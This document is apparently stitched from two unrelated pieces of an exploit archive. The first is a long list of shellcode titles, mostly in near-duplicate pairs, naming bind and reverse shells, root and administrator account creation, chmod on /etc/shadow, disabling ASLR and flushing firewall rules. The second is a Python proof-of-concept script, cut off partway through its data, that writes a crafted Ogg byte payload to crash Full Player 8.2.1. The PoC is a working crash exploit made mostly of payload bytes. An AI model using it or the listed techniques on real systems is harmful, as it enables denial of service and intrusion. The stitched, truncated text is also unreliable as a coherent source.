Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)
Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Write-to-file Shellcode (278 bytes)
Windows x86 - Write-to-file Null-Free Shellcode (278 bytes)
Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)
Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)
BSD/x86 - Bind Shell 2525/TCP Shellcode (167 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)
Windows x86 - Checksum Routine Shellcode (18 bytes)

Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)
Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)
Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode
ARM - Loader Port 0x1337 Shellcode
ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode
ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode
ARM - Loader (0x1337/TCP) Shellcode
ARM - ifconfig eth0 192.168.0.2 up Shellcode
ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)
Win32 - Speaking 'You got pwned!' Shellcode
FreeBSD/x86 - connect back Shellcode (81 bytes)
BSD/x86 - Bind Shell 31337/TCP + fork Shellcode (111 bytes)
Win32 - eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes)
OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)
Linux/x86 - ASLR deactivation Shellcode (83 bytes)
Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Linux/x86 - Reverse  TCP SSL Shell (localhost:8080) Shellcode (422 bytes)
ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)
Windows 5.0 < 7.0 x86 - Speaking _You got pwned!_ Null-Free Shellcode
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)
BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)
Windows x86 - eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)
OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)
Linux/x86 - Disable ASLR Security Shellcode (83 bytes)
Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)
Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)
Linux/x86 - Egghunter Shellcode (29 bytes)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)
Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)
Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)

Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)
Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)

Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)
Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode

Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)
Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)

Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)

Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)
Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)
Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)
Windows x64 - Bind TCP Shell Shellcode (508 bytes)
Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)
Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)

Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)
Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)

Windows RT ARM - Bind Shell 4444/TCP Shellcode
Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode
Windows - Messagebox Shellcode (113 bytes)
Linux/MIPS (Little Endian) - Reverse TCP Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes)
Windows - Add Administrator 'BroK3n' Shellcode (194 bytes)
Windows - Messagebox Null-FreeShellcode (113 bytes)
Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)
Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)
Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)
Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - Reverse TCP Shell (192.168.1.133:33333) Shellcode (72 bytes)
Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)
Linux/x86 - Disable ASLR Shellcode (84 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Disable ASLR Security Shellcode (84 bytes)
Linux/x86 - Typewriter Shellcode (Generator)
Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)
Linux/x86 - Typewriter Shellcode (Generator)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)
Win32/XP SP3 - Restart computer Shellcode (57 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)
Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)

Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - chmod() 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes)
Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes)
Linux/x86 - Bind Shell Netcat 5555/TCP Shellcode (60 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)
Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)
Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)
Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)
Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)
Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)
Linux/x86 - exec(_/bin/dash_) Shellcode (45 bytes)
Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode
Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)
Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)
Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode
OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)
Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)
OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)
Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)

Linux/x86 - Create file with permission 7775 + exit Shellcode (Generator)
Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)
OSX/x86-64 - Bind 4444/TCP Null-free Shellcode (144 bytes)
Linux/x86-64 - /bin/sh Shellcode (34 bytes)
Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)
OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)
Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)

Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)
Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)
Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)

Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)

Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)
Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)

Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)
Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)

Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)
Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)

Linux/x86-64 - Bind 5600/TCP Shellcode (81 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)

Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Linux/x86 - Reverse TCP Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind 1472/TCP Shell (IPv6) Shellcode (1250 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Win32 .Net Framework - Execute Native x86 Shellcode
Linux/x86-64 - Bind 1472/TCP Shell (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)

Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)
Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes)
Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes)
Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)

Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shellcode (64 bytes)
Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)
Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)
Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)
Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)
Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)

Windows x64 - WinExec() Shellcode (93 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)

Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)
Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)
Linux/x86 - Reverse Netcat + mkfifo  (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)

Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (Genearator) (129 bytes)
Linux/x86 - Reverse TCP Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)

Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)

Windows x86 - Executable Directory Search Shellcode (130 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)

Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)

Linux/x86-64 - Reverse Netcat Polymorphic Shell (127.0.0.1:1234) Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)

Linux/x86 - Bind Shell Shellcode (44 bytes)
Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Shellcode (67 bytes)
Linux/x86 - Reverse /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)
Linux/x86 - Disable ASLR Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Shellcode (113 bytes)
Linux/x86 - Disable ASLR Security Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - /bin/sh Shellcode (31 bytes)
Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)

Linux x86 - /bin/sh Shellcode (24 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)

Linux/x86_64 - kill All Processes Shellcode (19 bytes)
Linux/x86_64 - Kill All Processes Shellcode (19 bytes)

Php Cloud mining Script - Authentication Bypass
(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass
2017-08-23 05:01:29 +00:00

30 lines
No EOL
36 KiB
Python
Executable file

#!/usr/bin/python
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Full Player 8.2.1 Memory Corruption PoC
#[+] Date: 13-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7
#[+] Vendor: http://www.fplayer.net
#[+] Download: http://www.fplayer.net/full_player.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)
import os
os.system("color 02")
print"###########################################################"
print"# Title: Full Player-8.2.1 Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
crash=("\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B